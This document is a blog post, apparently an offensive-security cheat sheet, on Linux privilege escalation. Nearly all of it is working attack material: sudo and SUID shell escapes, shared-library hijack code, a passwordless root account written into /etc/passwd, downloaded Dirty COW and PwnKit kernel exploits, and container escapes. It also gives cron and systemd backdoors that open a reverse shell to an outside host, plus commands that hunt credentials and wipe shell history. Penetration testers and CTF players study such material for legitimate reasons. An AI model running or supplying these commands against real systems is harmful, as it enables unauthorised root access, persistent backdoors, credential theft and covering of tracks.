Breaking Root: The Ultimate Linux Priv Esc Handbook | Cyber Codex

Overview

Privilege escalation on Linux is both an art and a science. For red teamers, penetration testers, and CTF players, it’s the moment of truth — the final step where a low-privileged foothold morphs into full system compromise.

This post is a definitive breakdown — a field guide combining automation, manual tactics, CVEs, and post-exploitation persistence techniques. Every command here has been field-tested in live labs, CTFs, and real-world assessments.

Automated Enumeration Tools

Let’s start with the recon phase. Before exploiting, enumerate everything — system, users, cron jobs, SUIDs, capabilities, kernel, network, and more.

LinPEAS — The King of Enumeration

Copy

linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a              # All checks (deep mode)
./linpeas.sh -s              # Superfast stealth mode
./linpeas.sh -P password123  # With sudo password

LinPEAS dives through configs, sudo rules, cron jobs, kernel exploits, and more. Always run it first.

Linux Exploit Suggester

linux-exploit-suggester.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Version 2 adds even more CVE mappings:

linux-exploit-suggester-2.pl

wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl -k 3.9  # Specific kernel

Linux Smart Enumeration (LSE)

lse.sh

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1
./lse.sh -l2

pspy — Process Snooping without Root

Detects running cron jobs and background tasks.

pspy64

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -pf -i 1000

GTFONow — Automated Exploitation

Automates GTFOBins attacks (SUIDs, capabilities, sudo).

Copy

gtfonow.py

wget https://raw.githubusercontent.com/Frissi0n/GTFONow/main/gtfonow.py
python3 gtfonow.py

---

Manual Enumeration

Once you’ve automated, dive deep manually.

System Information

Copy

system-info

uname -a
cat /etc/issue
cat /etc/*-release
hostname
dmesg | grep Linux
lsb_release -a

User Enumeration

Copy

user-enum

id
whoami
cat /etc/passwd
cat /etc/shadow
cat /etc/group

Process and Network Recon

Copy

process-network

ps aux
ss -tulpn
ip a
iptables -L

Environment and History

Copy

env-history

env
echo $PATH
history
cat ~/.bash_history

Sudo Exploitation

Check Privileges

Copy

sudo-check

sudo -l
sudo -V

Common Exploits via GTFOBins

Copy

sudo-gtfobins-examples

sudo vim -c ':!/bin/sh'
sudo less /etc/hosts  # then !bash
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'

LD_PRELOAD Exploit

Copy

LD_PRELOAD exploit

cat > shell.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF

LD_LIBRARY_PATH Hijack

Copy

LD_LIBRARY_PATH hijack

cat > library_path.c << EOF
#include <stdlib.h>
void hijack() __attribute__((constructor));
void hijack() {
    setresuid(0,0,0);
    system("/bin/bash -p");
}
EOF
gcc -shared -fPIC -o /tmp/libcrypt.so.1 library_path.c
sudo LD_LIBRARY_PATH=/tmp command

CVE-2019-14287 — Sudo Bypass

Copy

CVE-2019-14287

sudo -u#-1 /bin/bash

---

SUID / SGID Exploitation

Find Binaries

Copy

find-suid-sgid

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Exploit Examples

Copy

suid-examples

/bin/bash -p
find . -exec /bin/sh -p \; -quit
vim -c ':py3 import os; os.execl("/bin/sh","sh","-pc","reset; exec sh -p")'
python -c 'import os; os.execl("/bin/sh","sh","-p")'

Create your own SUID binary:

Copy

create-suid-binary

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
/tmp/rootbash -p

---

Capabilities

Find all:

Copy

getcap

getcap -r / 2>/dev/null

Exploit cap_setuid:

Copy

cap_setuid

/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Exploit cap_dac_override:

Copy

cap_dac_override

python -c 'open("/etc/passwd","a").write("hacker::0:0::/root:/bin/bash\n")'

---

Cron Jobs & Timers

Enumerate

Copy

cron-enum

cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all

If writable:

Copy

echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /path/to/script.sh

Wildcard Injection:

Copy

wildcard-injection

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

---

NFS no_root_squash Exploit

Copy

nfs-no-root-squash

showmount -e [target_ip]
mount -t nfs [target]:/share /tmp/nfs
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash

---

Writable /etc/passwd

Add Root User

Copy

add-root-user

openssl passwd -1 -salt ignite password123
echo 'root2:$1$ignite$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su root2

---

Kernel Exploits

Dirty COW (CVE-2016-5195)

Copy

dirtycow

wget https://github.com/firefart/dirtycow/raw/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password123

PwnKit (CVE-2021-4034)

Copy

pwnkit

wget https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c
make
./cve-2021-4034

---

Docker & LXD Escalation

If user in docker group:

Copy

docker-chroot

docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

If LXD:

Copy

lxd-privesc

lxc init ubuntu:18.04 privesc
lxc config device add privesc disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash

---

Persistence Techniques

SSH Key

Copy

ssh-key

ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAA..." >> ~/.ssh/authorized_keys

Cron Backdoor

Copy

cron-backdoor

echo "* * * * * bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" | crontab -

Systemd Service

Copy

systemd-backdoor

cat > /etc/systemd/system/backdoor.service << EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
EOF
systemctl enable backdoor.service
systemctl start backdoor.service

---

Password & Credential Discovery

Copy

credential-discovery

grep -r "password" /home/ 2>/dev/null
find /var/www -name "*.php" | xargs grep -i pass
find / -name ".env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

---

Clean-Up & Stealth

Copy

cleanup

history -c && rm ~/.bash_history
unset HISTFILE

Use LinPEAS -s mode for stealth and clean any binaries or exploits post-use.

Resources

• https://gtfobins.github.io/

• https://book.hacktricks.xyz/linux-hardening/privilege-escalation

• https://github.com/swisskyrepo/PayloadsAllTheThings

• https://swisskyrepo.github.io/InternalAllTheThings/

• https://www.hackingarticles.in/privilege-escalation-cheatsheet-vulnhub/

Final Words

Privilege escalation isn’t about memorizing commands — it’s about understanding how misconfigurations become weapons. Each vector — from a simple SUID bit to a misconfigured NFS share — represents a story of trust broken and control seized.